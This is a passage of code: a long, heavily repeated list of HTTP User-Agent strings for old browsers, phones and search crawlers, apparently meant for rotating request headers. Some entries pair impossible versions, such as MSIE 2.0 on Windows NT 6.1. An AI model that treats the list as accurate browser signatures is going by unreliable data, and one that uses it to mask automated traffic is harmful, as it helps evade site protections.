'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
